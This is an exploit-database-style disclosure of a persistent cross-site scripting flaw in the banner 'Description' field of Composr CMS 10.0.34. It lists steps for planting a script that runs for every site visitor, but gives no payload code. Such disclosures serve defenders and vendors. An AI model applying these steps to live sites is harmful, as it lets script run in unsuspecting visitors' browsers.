    # Exploit Title: Composr CMS 10.0.34 - 'banners' Persistent Cross Site Scripting # Date: 3-12-2020 # Exploit Author: Parshwa Bhavsar # Vendor Homepage: https://compo.sr/ # Software Link: https://compo.sr/download.htm # Version: 10.0.34 # Tested on: Windows 10/ Kali Linux Steps To Reproduce :- 1. Install the CMS from the download link & configure it. 2. After configuration login with admin Credential . 3. You will notice “Add banner” in the top of the browser. 4. Click on it and Put XSS payload (any) in “Description” field. 5. Save it & Click on Home. 6. Every time any user visit the website , the XSS payload will trigger.